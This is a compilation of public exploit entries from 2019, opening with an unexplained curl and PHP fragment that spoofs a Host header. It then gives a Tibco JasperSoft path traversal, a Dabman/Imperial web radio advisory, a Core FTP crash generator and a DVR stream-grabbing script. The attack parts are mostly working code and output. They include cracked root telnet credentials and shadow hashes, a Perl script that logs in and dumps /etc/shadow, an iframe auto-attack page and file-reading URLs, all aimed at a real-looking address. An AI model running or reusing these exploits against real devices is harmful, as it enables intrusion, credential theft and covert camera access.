//  < HTTP/1.0 303 Redirecting
//  < Server: glass/1.0 Python/2.6.4
//  < Date: Sun, 08 Sep 2019 13:47:59 GMT
//  < Content-Type: text/html
//  < X-Frame-Options: SAMEORIGIN
//  < Set-Cookie: sid=InCkP0xGNg7fyAqL2mAO; expires=Tuesday, 10-Sep-2019 13:47:59 GMT; httponly; Path=/; secure
//  < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
//  < Pragma: no-cache
//  < Expires: Sun, 08 Sep 2019 13:47:59 GMT
//  < Last-Modified: Sun, 08 Sep 2019 13:47:59 GMT
//  < Location: https://scam-page.com/login?CSRFKey=c17fd622-f031-f0e0-2cab-2854acb4a443&referrer=https%3A%2F%2Fscam-page.com%2FSearch
//  < 
//  * Closing connection #0
//  * About to connect() to 192.168.1.1 port 443 (#0)
//  *   Trying 192.168.1.1... * connected
//  * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
//  * skipping SSL peer certificate verification
//  * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
//  * Server certificate:
//  *   subject: 
//  *   start date: Mar 19 00:00:00 2018 GMT
//  *   expire date: Mar 18 23:59:59 2020 GMT
//  *   common name:   
//  *   issuer: 
//  > GET / HTTP/1.1
//  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
//  Cache-Control: no-cache
//  Content-Type: application/x-www-form-urlencoded; charset=utf-8
//  Host: scam-page.com
//  Referer: scam-page.com
//  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//  
//  * HTTP 1.0, assume close after body
//  < HTTP/1.0 303 Redirecting
//  < Server: glass/1.0 Python/2.6.4
//  < Date: Sun, 08 Sep 2019 13:48:00 GMT
//  < Content-Type: text/html
//  < X-Frame-Options: SAMEORIGIN
//  < Set-Cookie: sid=NPPfo6uXJ5gPbJSPcNDE; expires=Tuesday, 10-Sep-2019 13:48:00 GMT; httponly; Path=/; secure
//  < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
//  < Pragma: no-cache
//  < Expires: Sun, 08 Sep 2019 13:48:00 GMT
//  < Last-Modified: Sun, 08 Sep 2019 13:48:00 GMT
//  < Location: https://scam-page.com/login?CSRFKey=32b0b069-34bb-1fdf-9f92-2de72a24cb65&referrer=https%3A%2F%2Fscam-page.com%2FSearch
//  < 
//  * Closing connection #0
//  


$url = "https://192.168.1.1";
$fake_host = "scam-page.com";
$ch = curl_init(); 

curl_setopt($ch, CURLOPT_URL, $url); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_VERBOSE, true);
$headers = [
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control: public',
'Content-Type: application/x-www-form-urlencoded; charset=utf-8',
'Host: '.$fake_host,
'Referer: '.$fake_host, 
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0',
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$output = curl_exec($ch); 
curl_close($ch);
echo $output;

Title: CVE-2018-18809 Path traversal in Tibco JasperSoft
Credit: Elar Lang / https://security.elarlang.eu
Vendor/Product: Tibco JasperSoft (https://www.jaspersoft.com/)
Vulnerability: Path traversal
CVE: CVE-2018-18809

# Path traversal
Vulnerability is in reportresource/reportresource/ service and in resource
parameter. There is "defence" - value for resource param must start with
net/sf/jasperreports/.

Available for remote not authenticated users.

## Proof-of-Concept
Reading file listing:
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../

Reading file content (js.jdbc.properties as an example):
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties

# List of Systems Affected, Related fixes and releases:
"TIBCO Security Advisory: March 6, 2019 - TIBCO JasperReports Library -
2018-18809"
https://www.tibco.com/support/advisories/2019/03/tibco-security-advisory-march-6-2019-tibco-jasperreports-library-2018-18809


# Vulnerability Disclosure Timeline

2018-10-15 | me > Tibco | Notification to security@tibco.com
2018-10-15 | Tibco > me | Thanks for PoC

2018-10-29 | me > Tibco | How is going? No fixes even for their own site.
2018-10-15 | Tibco > me | Explanation of policy that they threat everyone
equally and as no fix available for their customer, they can not fix their
own site also.

2019-01-11 | Tibco > me | Issue is still under investigation. Issue
discovery credits and publishing details coordination for future.
2019-01-11 | me > Tibco | Response, agreement with credits.

2019-03-06 | Tibco > me | "We published security advisories"
2019-03-06 | Tibco | "TIBCO Security Advisory: March 6, 2019 - TIBCO
JasperReports Library - 2018-18809"

2019-04-21 | me > Tibco | I'm going to write Full Disclosure, but your own
demo site is still vulnerable.
..
2019-04-26 | Tibco > me | Demo site fixed/updated now.

2019-09-07 | me | Full Disclosure on https://security.elarlang.eu

# More detailed description is available in blog:
https://security.elarlang.eu/cve-2018-18809-path-traversal-in-tibco-jaspersoft.html

--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com

Document Title:
===============
Dabman & Imperial (i&d) Web Radio Devices - Undocumented Telnet Backdoor
& Command Execution Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2183

Video: https://www.vulnerability-lab.com/get_content.php?id=2190

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13473
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13474

CVE-ID:
=======
CVE-2019-13473


Release Date:
=============
2019-09-09


Vulnerability Laboratory ID (VL-ID):
====================================
2183


Common Vulnerability Scoring System:
====================================
9.4


Vulnerability Class:
====================
Multiple


Current Estimated Price:
========================
5.000€ - 10.000€


Product & Service Introduction:
===============================
Since 1993, TELESTAR has been synonymous with quality and a very good
price/performance ratio in the consumer electronics segment.
TELESTAR-DIGITAL GmbH distributes high-quality reception technology for
digital TV reception via satellite (DVB-S), cable (DVBC)
or terrestrial (DVB-T) from its headquarters in the Vulkaneifel region
of Germany. The product portfolio includes digital receivers
and the latest generation of television sets as well as modern
distribution and single-cable technology, satellite to IP reception
solutions and radio transmission systems. The product range is rounded
off by Germany's most comprehensive range of accessories
for digital television reception.

(Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh )


Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered multiple
vulnerabilities in the dabman and imperial web radio devices series (typ
d & i).


Vulnerability Disclosure Timeline:
==================================
2018-06-01: Researcher Notification & Coordination (Security Researcher)
2018-06-02: Vendor Notification (Telestar Digital Data Security Department)
2018-06-07: Vendor Response/Feedback (Telestar Digital Data Security
Department)
2018-08-30: Vendor Fix/Patch (Service Developer Team)
2019-09-08: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Coordinated Disclosure


Technical Details & Description:
================================
1.1
The dabman and imperial manufactured web radio series (typ d & i)
suffers from a weak password vulnerability.
The vulnerabilites allows local and remote attackers to compromise the
web radios full embedded linux busybox os.

The vulnerability is located within an undocumented telnet service
(telnetd) of the linux busybox and is
turned permanently on. The telnetd service uses weak passwords with
hardcoded credentials on the local embedded
linux busybox of the internet radio devices. The telnet password can be
cracked by usage of simple manual password
bruteforce technics or by basic automated attacks with scripts (exp.
ncrack). After receiving the password the
remote or local network attacker can unauthorized login to the internet
radio device to use the embedded linux
busybox operating system.

After the attacker has been logged in as root user, he can open the
/etc/ path to cat gshadow, shadow and the conf files.
At the end the attacker has finally full root access on the busybox
(telnetd), he can access the web-server (httpd) as
admin and see the wireless lan + unencrypted key in ./flash/ - wifi.cfg.
A demo exploit poc is available in the wild.

Vulnerable Protocol(s):
[+] telnetd

System(s):
[+] BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash)
(Debian Linux PreRelease - ARM 3.3.2)

Firmware Version(s):
[+] TN81HH96-g102h-g102

Manufacturer:
Telestar Digital Gmbh

Affected Version(s):
[+] Bobs Rock Radio
[+] Dabman D10
[+] Dabman i30 Stereo
[+] Imperial i110
[+] Imperial i150
[+] Imperial i200
[+] Imperial i200-cd
[+] Imperial i400
[+] Imperial i450
[+] Imperial i500-bt
[+] Imperial i600


1.2
The dabman and imperial manufactured web radio series (typ d & i)
suffers from a command execution vulnerability.
The vulnerability allows local and remote attackers unauthorized and
unauthenticated send commands to comprimise the web radio devices.

The vulnerability is located httpd web-server communcation on port 80
and 8080. Local and remote attackers can send basic GET
commands with basic command line tools (exp. curl or modhttp) to modify
or manipulate http requests. The attacker can also capture
the http airmusic commands to reverse engineer the radio device for
unauthorized interactions. The system has no protection mechanism
to block unauthorized transmit of commands. The web radio as well not
owns an auth or reminder mechanism to ensure only allowed or
trusted sources can transmit the commands (client, system, mac , auth ...).

Vulnerable Protocol(s):
[+] httpd

Module(s):
[+] UIData (Web UI on 80 or 8080)

Function(s):
[+] /set_dname
[+] /mylogo
[+] /LocalPlay
[+] /LocalPlay
[+] /irdevice.xml
[+] /Sendkey
[+] /setvol
[+] /hotkeylist
[+] /init
[+] /playlogo.jpg
[+] /stop
[+] /exit
[+] /back
[+] /playinfo

Parameter(s):
[+] ?name=PWND
[+] ?url=./*.jpg
[+] ?url=/stream.wav&name=*
[+] ?url=/msg.wav&save=*
[+] ?key=*
[+] ?vol=*0&mute=*
[+] ?language=*

Affected Function(s):
[+] Air Music Controls

Manufacturer:
Telestar Digital Gmbh

Affected Version(s):
[+] Bobs Rock Radio
[+] Dabman D10
[+] Dabman i30 Stereo
[+] Imperial i110
[+] Imperial i150
[+] Imperial i200
[+] Imperial i200-cd
[+] Imperial i400
[+] Imperial i450
[+] Imperial i500-bt
[+] Imperial i600


Proof of Concept (PoC):
=======================
1.1   Undocumented Telnet Service (telnetd)
The security vulnerability can be exploited by local and remote
attackers without user interaction or privileged user account.
For security demonstration or to reproduce follow the provided
information and steps below to continue.


Nmap Portscan
Scanning R-MAVERIC-EMAC_1_01_018 (93.234.141.215) [1000 ports]
Discovered open port 8080/tcp on 93.234.141.215
Discovered open port 80/tcp on 93.234.141.215
Discovered open port 23/tcp on 93.234.141.215
Completed SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports)
Initiating Service scan at 14:48
Scanning 3 services on R-MAVERIC-EMAC_1_01_018 (93.234.141.215)
Completed Service scan at 14:48, 6.20s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against R-MAVERIC-EMAC_1_01_018
(93.234.141.215)
NSE: Script scanning 93.234.141.215.
Initiating NSE at 14:48
Completed NSE at 14:49, 30.61s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Nmap scan report for R-MAVERIC-EMAC_1_01_018 (93.234.141.215)
Host is up (0.010s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     security DVR telnetd (many brands)
80/tcp   open  tcpwrapped
|_http-title: AirMusic
8080/tcp open  http       BusyBox httpd 1.13
| http-methods:
|_  Supported Methods: GET
|_http-title: 404 Not Found
MAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.16 - 2.6.35 (embedded)
Uptime guess: 5.967 days (since Sun Jun 23 15:36:08 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=197 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


NCrack [telnetd] (ncrack -v --user root [IP]:[PORT])
C:Program Files (x86)Ncrack>ncrack -v --user root 93.234.141.215:23
Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21
Mitteleuropõische Sommerzeit
Discovered credentials on telnet://93.234.141.215:23 'root''password'
Discovered credentials on telnet://93.234.141.215:23 'root''password1'
Discovered credentials on telnet://93.234.141.215:23 'root''password2'
Discovered credentials on telnet://93.234.141.215:23 'root''password123'
Discovered credentials on telnet://93.234.141.215:23 'root''password12'
Discovered credentials on telnet://93.234.141.215:23 'root''password3'
Discovered credentials on telnet://93.234.141.215:23 'root''password!'
telnet://93.234.141.215:23 finished. Too many failed attemps.
Discovered credentials for telnet on 93.234.141.215 23/tcp:
93.234.141.215 23/tcp telnet: 'root''password'
93.234.141.215 23/tcp telnet: 'root''password1'
93.234.141.215 23/tcp telnet: 'root''password2'
93.234.141.215 23/tcp telnet: 'root''password123'
93.234.141.215 23/tcp telnet: 'root''password12'
93.234.141.215 23/tcp telnet: 'root''password3'
93.234.141.215 23/tcp telnet: 'root''password!'
Ncrack done: 1 service scanned in 273.29 seconds.
Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117
Ncrack finished.


System:
BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash)

Kernel:
9)20151217_M8_TFT_7601_Kernel

OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC:
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC:
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian
prerelease)Aaeabi.shstrtab.init.text.fini.
rodata.ARM.extab.ARM.exidx.eh_frame.init_array.
fini_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes


Built-in commands:
 . : [ [[ bg break cd chdir continue echo eval exec exit export
false fg hash help jobs kill local printf pwd read readonly return
set shift source test times trap true type ulimit umask unset wait

Currently defined functions:
        [, [[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput,
        gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc,
login,
        ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod,
route,
        run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc,
        udhcpd, umount, unlzma, usleep, zcat


Username: root
Password: password & password!

shadow
root:r.BF8RVw56BOA:1:0:99999:7:::  (decrypted: password & mldonkey)
ftp:!:0::::::        (decrypted: empty/blank)
usb:w.rW11jv2dmM2:13941::::::    (decrypted: winbond)

gshadow
root:::root,mldonkey


PoC: Exploit
use Net::Telnet ();
use Cwd;
$file="inputLog.txt";
$ofile="outputlog.txt";

# For local network change to localhost or local ip
@hosts = ("93.234.141.215");

foreach $hostip (sort @hosts)
{
    $t = new Net::Telnet (Timeout => 10,
                    Input_log => $file,
                    Prompt => "/>/");
    print "nnConnecting to undocumented Telnet Service of Imperial or
Dabman Web Radio Service: $hostip ...n";
  print "nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150,
i200, i200-cd, i400, i450, i500-bt, i600n";
    $t->open("$hostip");
    $t->login("root","password");
    my @lines = $t->cmd('cat /etc/shadow');
    print "$hostip: Directories:n";
    print "@lines n";
    $t->close;
}



1.2  AirMusic Unauthenticated Command Execution (httpd)
The security vulnerability can be exploited by local and remote
attackers without user interaction or privileged user account.
For security demonstration or to reproduce follow the provided
information and steps below to continue.

AirMusic Status Interface: http://93.234.141.215:80
Web-Server HTTPD UIData Path: http://93.234.141.215:8080

Note: Attacks can be performed in the local network (Localhost:80) or
remotly by requesting the url remote ip adress (93.234.141.215) +
forwarded remote port(Standard :23).

Get device name from Device
http://93.234.141.215:80/irdevice.xml

Set device name
http://93.234.141.215:80/set_dname?name=PWND

Set boot-logo (HTTP URL, requirement: JPG)
http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg

Display or retrieve channel logo
http://93.234.141.215:80:8080/playlogo.jpg

Changing the main menu with the selected language
http://93.234.141.215:80/init?language=us

Play stream
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME

Save audio file as message
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1

Recall channel hotkeys
http://93.234.141.215:80/hotkeylist

Current playback data
http://93.234.141.215:80/playinfo

Set volume from 0-31 & mute function
http://93.234.141.215:80/setvol?vol=10&mute=0

Reset
http://93.234.141.215:80/back

Set stop
http://93.234.141.215:80/stop

Activate all back
http://93.234.141.215:80/exit

Send keystroke combo
http://93.234.141.215:80/Sendkey?key=3


PoC: Exploit
<html>
<head><body>
<title>Dabman & Imerpial - HTML AutoPwner</title>
<iframe src=http://93.234.141.215:80/set_dname?name=PWND></iframe>
<iframe
src=http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg></iframe>
<iframe
src=http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME></iframe>
<iframe
src=http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1></iframe>
</body></head>
<html>


PoC: Checker for Modifications
#!/usr/bin/perl

use strict;
use warnings;
use LWP::Simple;

my $url1 = 'http://93.234.141.215:80/';
my $source1 = get( $url1 );

my $url2 = 'http://93.234.141.215:80/';
my $source2 = get( $url2 );

print $source1;
print $source1;


Solution - Fix & Patch:
=======================
A fresh updated version is available by the manufacturer telestar to
resolve the vulnerabilities in all i & d series products.
It is recommended to install the updates as quick as possible to ensure
the digital security.

1. Set the device to the factory setting
2. Select language
3. Switch off the device
4. Switch on the device
5. Network setup
6. Wait for "New Software" message
7. Press OK to start the update
8. Updated Version: TN81HH96-g102h-g103**a*-fb21a-3624


Security Risk:
==============
The security risk of the vulnerabilities in the online web radio with
wifi and user interface are estimated as critical.
The vulnerability can be exploited by local attackers in a network or by
remote attackers without user interaction or
further privileged user accounts. The potential of the issue being
exploited in thousends of end user devices all over europe
is estimated as high. The issue has the potential that could be used by
remote attackers for spreading randomware / malware,
mass defacements, compromises for further linux network attacks or being
part of a criminal acting iot botnet.


Credits & Authors:
==================
Benjamin K.M. [VULNERABILITY LAB - CORE RESEARCH TEAM] -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2019 | Vulnerability Laboratory - [Evolution
Security GmbH]™
-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

#!/usr/bin/python

# Exploit Title:  Core FTP LE Version 2.2, build 1935 - Local Buffer
Overflow (SEH Unicode)
# Vulnerability Details: Core FTP LE Version 2.2, build 1935 is prone to a
buffer overflow vulnerability that may result in a DoS user local folder
selection pane
# Exploit Type  : DOS
# Date: 08-Sep-2019
# Vulnerable Software: Core FTP LE
# Version: Version 2.2, build 1935
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/download/coreftplite.exe
# Tested Windows : Windows Vista Ultimate SP2(32-bit), Windows 7
Professional SP1(32-bit)
# Exploit Author: Debashis Pal

#Timeline
# Vulnerability Discover Date: 01-Sep-2019
# Vulnerability Report to Vendor:01-Sep-2019,No responds
# Again email to Vendor:05-Sep-2019 ,No responds
# Public Disclose : 08-Sep-2019

# PoC
# 1. coreftpleversion2-2build1935.txt from POC.py code, open in
notepad(coreftpleversion2-2build1935.txt), copy contents
# 2. Open Core FTP LE(Version 2.2, build 1935)
# 3. Select the left interface(CORE FTP LE,local folder selection pane)
# 4. paste contents from notepad
# 5. Application will crash and SEH overwritten with Unicode



crash =  "\x43"  * 585 #Junk
crash += "\x42"  * 2   #nSEH
crash += "\x41" *  2   #SEH
crash += "\x44"  * 411 #More Junk


file="coreftpleversion2-2build1935.txt"
generate=open(file, "w")
generate.write(crash)
generate.close

#Attachment: Application will crash and SEH overwritten with Unicode.jpg

Thank you,
Debashis Pal

#!/bin/bash
#
#
# Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
#
#
# Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd.
# Product web page: http://www.rifatron.com
# Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504)
#                   7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2)
#                   Firmware: <=8.0 (000143)
#
#
# Summary: Rifatron with its roots in Seoul, Korea has been supplying and
# servicing the security market as a leading CCTV/video surveillance security
# system manufacturer, specializing in stand-alone digital video recorder since
# 1998. We are known for marking the first standalone DVR with audio detection
# and 480 frames per secone(fps) and have been focusing on highend products and
# large projects in a variety applications and merket. These include government
# and public services, banking and finance, hotels and entertatinment, retail
# education, industrial and commercial sectors throughout Europe, Middle East,
# the U.S. and Asia. Based on the accumulated know-how in the security industry,
# Rifatron is trying its utmost for the technology development and customer
# satisfaction to be the best security solution company in the world.
#
# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
# disclosure when animate.cgi script is called through Mobile Web Viewer module.
#
# Tested on: Embedded Linux
#            Boa/0.94.14rc21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2019-5532
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php
#
#
# 03.09.2019
#

#{PoC}
#
set -euo pipefail
IFS=$'\n\t'
if [ "$#" -ne 2 ]; then
    echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15
    echo "Ex.: $0 10.9.8.7:65432 10"
    exit
fi
IP=$1
CHANNEL=$2
HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL"
STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F""'{print $2}')
if [ "$STATUS" == "404" ]; then
    echo "Target not vulnerable!"
    exit
fi
echo "Collecting snapshots..."
for x in {1..10};
    do echo -ne $x
    curl "$HOST" -o sequence-$x.jpg -#;
    sleep 0.6
    done
echo -ne "\nDone."
echo -ne "\nRendering video..."
ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4
echo " done."
echo -ne "\nRunning animation..."
sleep 1
cvlc video.mp4 --verbose -1 -f vlc://quit
#
#{/PoC}